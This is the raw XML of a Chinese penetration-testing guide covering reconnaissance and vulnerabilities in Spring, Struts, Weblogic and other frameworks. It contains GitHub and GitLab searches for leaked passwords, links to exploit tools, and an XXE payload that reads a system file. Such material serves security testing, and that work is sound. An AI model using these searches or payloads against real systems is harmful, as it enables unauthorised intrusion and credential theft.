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25pt;margin-top:19.8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30"/>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30"/>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30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">1.1 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">1.2 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">1.3 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>异常及</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>
            </w:rPr>
            <w:t>DEBUG</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">1.4 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>2.1 WEB</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">2.2 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">2.3 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">2.4 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">2.5 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">2.6 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>3.1 Struts</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>3.2 Spring</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>3.3 Axis2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>3.4 XFire</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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 xml:space="preserve">PHP </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>4.1 Laravel</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>4.2 Yii</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>4.3 ThinkPHP</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">4.4 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>其他</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>
            </w:rPr>
            <w:t>PHP</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>
            </w:rPr>
            <w:t>5.1 Weblogic</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>5.2 Jboss</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>5.3 Jenkins</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>5.4 WebSphere</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>5.5 Apache Shiro</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>5.6 Spring Boot Actuator</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>
            </w:rPr>
            <w:t>6.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>6.2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>6.3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>6.4</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">7.1 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">7.2 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">7.3 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>
            </w:rPr>
            <w:t>8.1 XSS</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>8.2 SQL</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">8.3 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.1 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.2 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.3 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.4 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.5 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.6 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.7 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.8 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t xml:space="preserve">9.9 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>
            </w:rPr>
            <w:t>10.1 Confluence</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>10.2 Redmine</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>10.3 Jira</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>10.4 Gitlab</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>10.5 Jenkins</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>10.6 Zabbix</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>10.7 Harbor</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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其他</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>
              <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
            </w:rPr>
            <w:t>Web</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>11.1 URL</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>11.2 CSRF</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>
            </w:rPr>
            <w:t>11.3 SSRF</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="30"/>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30"/>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30"/>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numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc527108518"/>
      <w:bookmarkStart w:id="2" w:name="_Toc27676904"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务规划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc27676905"/>
      <w:bookmarkStart w:id="4" w:name="_Toc527108519"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息获取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从业务线处获知测试项目、域名或APP、关注点、账号、注意点等信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc527108520"/>
      <w:bookmarkStart w:id="6" w:name="_Toc27676906"/>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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc527108521"/>
      <w:bookmarkStart w:id="8" w:name="_Toc27676907"/>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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc27676908"/>
      <w:bookmarkStart w:id="10" w:name="_Toc527108522"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc27676910"/>
      <w:bookmarkStart w:id="12" w:name="_Toc527108524"/>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"https://www.godeye.vip/index/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.godeye.vip/index/</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http://finger.tidesec.net/</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30"/>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30"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/urbanadventurer/WhatWeb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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whatweb -v -a 3 domain.com</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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc527108527"/>
      <w:bookmarkStart w:id="18" w:name="_Toc27676913"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞挖掘</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left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53"/>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52"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/search?q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>baidu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.com+password&amp;type=Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://gitlab.com/search?utf8=%E2%9C%93&amp;snippets=&amp;scope=&amp;search=pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc527108530"/>
      <w:bookmarkStart w:id="24" w:name="_Toc27676916"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索引擎信息泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="2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30"/>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62"/>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52"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/scopion/dic</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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc527108531"/>
      <w:bookmarkStart w:id="28" w:name="_Toc27676917"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常及DEBUG信息泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>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52"/>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pict>
          <v:shape id="_x0000_i1025" o:spt="75" alt="811F170B-EF2E-4DB8-9C5D-731F3B2376CC.png" type="#_x0000_t75" style="height:196pt;width:379.95pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f" joinstyle="miter"/>
            <v:imagedata r:id="rId9" r:href="rId10"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numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc27676926"/>
      <w:bookmarkStart w:id="30" w:name="_Toc527108533"/>
      <w:bookmarkStart w:id="31" w:name="_Toc27676919"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发框架漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java开发框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>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 xml:space="preserve">利用工具有 </w:t>
      </w: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30"/>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widowControl w:val="0"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc27676928"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pring框架漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>Spring框架漏洞，包含Spring Framework，Spring Boot，还有Spring Cloud，Spring Data，Spring Security等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自从引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>SpEL表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后，Spring也被发现了很多命令执行漏洞。可参考 https://github.com/vulhub/vulhub/tree/master/spring。</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Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>框架全家桶。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"https://github.com/scopion/SpringScan，https:/github.com/scopion/SpringBootVulExploit，" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/scopion/SpringScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，https://github.com/scopion/SpringBootVulExploit，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>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cve-2010-1622</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:利用条件复杂见 cve-2010-1622.docx，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2013-4152</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6374130" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="1270" b="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11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6374130" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///bin/bash"&gt;]&gt;&lt;user&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;name&gt;admin&lt;/name&gt;&lt;/user&gt;</w:t>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CVE-2014-3578</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5752465" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="635" b="825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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5752465" cy="2760345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2016-2173</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/scopion/CVE-2016-2173</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2016-4977</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"https://github.com/scopion/vulhub/blob/master/spring/CVE-2016-4977/README.zh-cn.md" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/scopion/vulhub/blob/master/spring/CVE-2016-4977/README.zh-cn.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CNVD-2016-04742</w:t>
      </w:r>
